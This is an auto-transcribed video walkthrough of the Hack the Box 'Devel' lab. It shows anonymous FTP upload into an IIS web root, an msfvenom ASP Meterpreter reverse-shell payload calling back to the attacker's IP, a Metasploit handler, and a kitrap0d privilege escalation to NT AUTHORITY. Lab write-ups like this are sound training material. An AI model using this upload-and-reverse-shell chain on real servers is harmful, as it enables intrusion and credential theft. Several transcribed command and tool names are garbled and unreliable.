What is up, YouTube? And in today's video we're going to be talking about the machine Devel. Devel is a relatively simple machine. It demonstrates the security risk associated with some default program configurations. It is a beginner level machine which can be completed using publicly available exploits. In this video you're going to learn how to identify vulnerable services, how to exploit weak credentials, and how to do some basic Windows privilege escalation. So without further ado, let's begin the video. Alright, as you see here, I'm on my Kali machine, and here we can obviously see that I've connected to the VPN. How I did that was I download my VPN package from Hack the Box, and then I sudo OpenVPN it, and then it authenticates to the Hack the Box servers. We minimize this, we don't need this anymore. Okay, so going to my note-taking system as I have on my desktop here. I have the machine Devel. Alright, as I know obviously from the Hack the Box website that it lives on 10.10.5. After I've authenticated and I've started the machine on Hack the Box, I need to ping it to see if it's alive. And it is. As you see, we get a response with a fairly decent ping. Before this, I've done my Nmap scan, and I did an Nmap scan default script. So how I did that was I would Nmap -sc for default script and -sv for service enumeration on all ports on 10.10.10.5. I pressed enter. The results is here as you see. Now, when you see something like this, you know, I obviously scanned all the ports, both UDP and TCP, and when I see this, my mind should immediately go, okay, cool. We have a file transfer protocol service open, and it's anonymous FTP logging around. Okay, this is very, very important information. This is not good. It should never be enabled, but in this scenario it is. So we're gonna see if we can exploit it. We also have Microsoft IIS HTTPD on version 7.5. And then we can obviously check that out by going to our browser and entering it. But one of the first things when you see something like this, the first thing you should do is which I'm going to demonstrate here on my tablet, is obviously we know HTTP means Hypertransfer Text Protocol, and FTP means File Transfer Protocol. So if this can transfer files, and this is hosted on a web server to display a website and to host a website and show you the contents of a website, what I need to think about is how can I combine the two to transfer files to the website in order to execute and to display something on the website, or to execute something on the server that I want. Okay, so when you see FTP, File Transfer Protocol, and you see HTTP, you should think about, okay, how do I combine the two? How do I use that protocol to transfer a file to the HTTP, where it's, obviously hosting the web server, where the web server is, sorry. And how can I put a file in there that I want that can exploit the system and do things that I want? Because obviously we can generate a shell, or we can generate a file that we can put in there and exploit to our need. Okay, so in this video that's what we're going to be doing, and I will be explaining this. Obviously, let me just put this here, exploit, and we need to think about how we're going to proceed, how we're going to do this. But obviously, before we do anything else, we need to enumerate the website. Okay, so enumerating the website is not going to be very difficult. We're just going to open our browser. Oh, I think I already opened it before. Let me just close this one. Okay, put this to the left. We know it's on 10.10.5 HTTP. Okay, 10.10.5. We press enter. Obviously, if you have established a connection to the server, you should be able to immediately see it. We just see a default IIS page, Internet Information Service. We view the page source. Not much in here that we can make use of. We can try some different stuff. Robots.txt. I'm not allowed to see that. Robot.txt. I don't know, admin, this is some sort of, PHP my admin, just, try whatever you can. And if you can't find anything, obviously you can try and conduct a directory brute force. Okay. Remember, as we said, that FTP is also vulnerable, but also, this is in front of us right now. We can look at it. So we don't have much here, if you don't know what IIS is, you can just go to Google, and just write Microsoft IIS 7.5. Obviously, you see search engine now knows me. It's telling me exploits and showing me different vulnerabilities. So IIS is an Internet Information Service, is an extensible web server software created by Microsoft for the use with their Windows NT family, HTTP, HTTPS, FTP, blah blah blah. Okay, it's written in C++. These are all good things to know. Okay, so it's a web server software. It was created by Microsoft. That's all we need to know. Now we need to learn how to exploit this, right? So we didn't find much in terms of the website and looking at the but from what I see here, it says welcome IIS. This is a default login page for the IIS. We shouldn't be seeing this. So immediately our mind should go, okay, cool, there could be another type of error. So now going back to our machine, as I said, the results of this was this. So now we're going to look at FTP, anonymous FTP login allowed. So simple FTP 10.10.5. Okay, anonymous, FTP directory. Okay, cool. Okay, shell. Okay, we're inside the FTP session. I feel like someone has tried a crap ton of different shells on the system before. If it does cause us issues because the system may be broken, I will restart it and try. I will reset the machine, and try again. Okay, so what I see here is iis start.htm. Okay, interesting. Enumerating the website again, we see welcome.png, and here we go. So that picture we see here, okay. So this whole this is a PNG file, right? It's a picture showing us the IIS thing, and when you click it, by the way, it redirects you to the Microsoft website. So we do not want to be here. We want to go back to the website we were enumerating. And this is the file, welcome.png. It's in the directory here of the FTP session that we're in. All right. For now, we're going to ignore everything else we see here because this shouldn't be here because I've done this machine before. It should only have this, and I think the IIS, the HTML file. We see a different directory. So we see directory. So we see here it says directory. So these are files and these are directories. ASP_client. So we're going to say cd into ASP.NET _client. Oops, bad typing on my end. Client, and we're in directory. Okay, we see another directory. So cd system_web. We go directory. We see another directory. So what I would do is just let's see. So I went one folder back, one directory back, and since I see directories within directories, I might as well just download this entire directory, right? So if you type in help on FTP, it will tell us some stuff, but it won't tell us exactly what it is. But these are the commands, and the main ones you need to know is get and put, okay? Get is to download, put is to upload, okay? We want to, as I said earlier with the demonstration that I did regarding HTTP and FTP, if FTP, I can transfer files, then, with put, I'm going to upload, and with get, I'm going to download. So I'm going to get system web. Access is denied. Okay, it seems like I can't do it. Okay, so I can't download it. Okay, good on the developer side. Then I guess what we have to do is so we need to cd into ASP.NET.client. So this is the fun things about hacking, is you need to continuously test until you get somewhere. Okay, cd to _0_50727 ls. Come on, data connection already complete, transferring, so ls. Okay, sorry, directory. No. cd directory. Okay, so this directory cd to _0_50727. I can't. There's pretty much nothing in there. So what we can do is we can go back to the main directory and see if we can download the image file. Can we? Yes. Okay, good. So we were able to download the, so I said get welcome.png. We were able to we were able to download the welcome.png file, which is this picture. Okay, now I'm thinking, okay, how do I upload another file and see if I can view it, right? If I can see this, hopefully I can see something else. So what I can do is I can go back here. Let's close everything we have here. Go to Google and just say, you know, animal, I don't know, images. And we're going to put this tiger on the website. Now, this size is big. I don't want to put a large picture into the website. You know, that can be fairly problematic. So, small pictures, I guess. Okay, 800 by 500 could be good. I should have written something like, you know, smaller resolution, or just write 400 times 400, but so it came on top of my head, which is fine. Okay, we're going to download this JPEG and name it pet.jpg. Okay, I think I downloaded it into, it's on the desktop. Okay, cool. Now the FTP session is always going to be running on the the directory you're in. So whatever you put and you get, it's going to go back to that directory that you're in. So if I've downloaded so obviously I go back up, I can see that I'm in the Kali root folder. So now I need to cut this, to be honest, and go up, and we have the welcome.png file here. So because we downloaded it into this file, okay, this image can't be opened, whatever, paste it. Okay, now I have the pet, so we're in the same directory in both the terminal and our host system. Now I'm going to put pet.jpg into the system. Transfer sent. Okay, let's check it. Directory. Pet.jpg. Good stuff, good stuff. Now let's see if we can view it. Okay, so .png. Okay, good. This is the picture. So we know that the picture is on the main directory. Now let's try and, all right. Oh, here we go. Okay, we have the picture at a very low resolution, but we know we can upload it. Good. This is very, very good news. That means we can upload a file and even view it at the main directory here after the IP we have. And we should now see if we can find an exploit for this. Okay. Now, in our, how are we going to exploit this system, right? We click this and we go to the, okay, so what we know is this is written in ASP, right? And we need to look for something in the lines of ASP.NET exploits, okay, and cheat sheets. Okay. We're gonna Google and look for an exploit for this. So let's just quit this. And remember we had, okay, so exploit. Okay, we don't get anything. Okay. So now that we have a FTP session, and we know there's HTTP, and on HTTP port 80 we have an IIS7, we need to find out what type of exploits is compatible, right? So we write IIS7 is compatible, is written language. Okay, so when you open, for example, from Stack Overflow, it tells you that probably C++, the core that is that's the core, and the newer version such as 7, IIS 7, is written in other languages from the .NET family, so ASP.NET. So we now know it's ASP.NET exploit that we should be looking for. So we say ASP.NET shells in Google, or we'll just do MSF Venom cheat sheet blah blah ASPX, and I usually go for this one, NetSec. Let's see what Red Team Tutorials has. So we're just going to do a bit of a search run. Okay, this is not bad. It's just a bit more. So if I were to look for, okay, it's an ASP. Okay, here you go. So you have it. It's a bit more unorganized. This website has it more organized. Okay, so here we see a list of payloads using Metasploit. We have Linux, Windows, Mac, and then we have web payloads because we know, remember, this is a web server. We got PHP here when we have ASP. So using this command line here, we can, let's put it to the right here, we can create a file, and then we're going to send that to the system via the FTP. So before we do that, let's just prepare this exploit. So MSF Venom-P Windows Interpreter, your IP address. So what is our IP address? So fconfig sudo fconfig. Okay. 10.10.14.9. So we go 10.10.14.9. You might be wondering, oh, why am I doing it here? Well, the main reason for that is so that I can refer back to it in my notes, what exploit, what command I use, and etc. The port I'm going to connect on, I'm going to use 4444-F ASP output shell.asp. Okay. Just double checking. Oh, and here we go. So this is the Metasploit handler. It teaches you how to basically use it. Now let's give this command line a go. Okay, I want to go there, and then we'll create this file. And then we're gonna have to open Metasploit, so that'll be MSF console. Wait for that to open. Wait for this file to be created. Use exploit multi-handler. Copy that. Paste selection. Clear options. Oh, lhost should be. Sorry, I'm just concentrating on writing down what I should be doing. 10.10.14.9, and then we have the L port of 4444. We've set the payload to interpreter reverse TCP, and now we'll run. Handler failed to bind. Start reverse TCP handler on 000 localhost F4. Okay. shell.asp. So we have our, do we or do we not? Okay. Interesting. That's word lists. Okay, now I just need the file. Oh, here we go. My bad, guys. Here we go. So we have the file that we created from above. I'm like, what the hell? There's a 341 byte file and I don't know where it is. Silly me. Things like that happen, especially when you're not concentrating very well. My apologies. Shell.asp. Now we're going to do FTP on that. We know it's not. Oops. Nope. You type in by to close the session. Because I entered that username wrong, so it's anonymous. Okay, perfect. And then we say put shell.asp. This won't cause us an issue. So now that I have a shell.asp, so I'll just be like, I can bring this here, so I'll be like 10.10.5 / shell.asp, and we have a problem. 10.10.14. Oh god. It happens. One digit can mean life and death. I would like to try the normal ASP one again, to be honest. Just because that's how I initially did it. Okay. It was 0.49 on the L host. So changes so very often. Okay, here we go. It started it, didn't cause that error. From now on, if I see that error, I should know that that error means something's wrong, and that meant it couldn't connect to the L host because that IP didn't exist or that tunnel didn't exist. So silly me, I have to learn from my mistakes. And press ls. Do we have shell.asp? Yes, we do. FTP 10.10.5. Good. No. Put sp. Replace it most likely. Enter this. Enter that. Start a reverse TCP handler. Interesting. Okay. That was long. Interesting. Now that we have a shell, we also find out that we are IIS APP pull web, so we're the web user. Now, I want to privilege escalate. The best way to do that with Meterpreter is to go to the back into the Meterpreter shell while having the session open. With the session open, we're going to do a search suggester. So let's start with this background. So now we're back. So backgrounding session 1, meaning the session is now in the background. Let's clear up our screen. And what we're going to do now is we're going to say search suggester. Yes. Blah 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 is 0 options. Set session 1. So we're setting a session 1, and then from here we can say, okay, please find out which tools will potentially give us a privileged user, possibly a root or admin NT authority. That way we'll have full control over the system. We'll wait for this to finish. "34 exploit checks are being tried." That's good. Okay. Looking at the list, we can do individual searching on each of these exploits, and they could be vulnerable to any one of these. For now, I know for a fact that this one, Ketrapod, is known. It's a well-known exploit for privilege escalation, and we will use this one because I already know from my research that this works. So I don't want to go through every single one and make mistakes, but it says the service. So the other reason is it says, for example, for this exploit here, bypass event viewer. So this will bypass event viewer. The target appears to be vulnerable. This one here is different. It says the service is running but could not be validated. Okay, so we know there's a service in here that can be exploited. Okay, so we'll say, okay, that's one of the main reasons. And oops, yep, now I've got Ketrapod options, and all I need to do is change my lhost. That's weird. 1449. Always check your lhost, guys, please. Set L port up. Yeah, change the L port to 4445. Oh, set session 1, I think. Should. Yeah, you have to set the session that you want to use this exploit on. Exploit finish rate, hopefully privileged payload exclusion. Exploit completed, but no session was created. Exploit again. Sometimes with exploits you have to try it multiple times. It's the only way to break it. To break it, you need to smash it. Smash that exploit by typing in exploit. Okay. Again. So if it fails, you have to try again. You have to run the multi-handler again, as the exploit will mess up your current session. Run the exploit in the browser again. Go back to the same exploit that we chose in the privesc, and run it again, and it should work. So was it foregrounds? Okay, so jobs, no active jobs. Okay, so session 1. All right, so all I had to do was very, very simple. I had to close the Meterpreter session. I simply reran the multi-handler. So I just reran it. As you see, it started. And then what I did was I went back to my browser. I just pressed enter. I refreshed it. I got a session again. Right. This time it's a interpreter session 2 because session 1 broke with the first time we're trying to conduct a Previsk. I did a background on my current session, backgrounding session 2, as you see. And then I quickly, instead of, search the suggester, which was a technique I wanted you guys to learn, I quickly said use exploit catcher pod, and I ran it, and I immediately, I also, very important guys, you set session to number 2. So before I set session to 1, now I set session to number 2. I press run, and that's it. Get your ID, I'm NT authority. Now I can do hash dump, I can do a crap ton of things, especially with the power of interpreter in my hands. I hope you enjoyed this video. If you did, like, subscribe, and comment.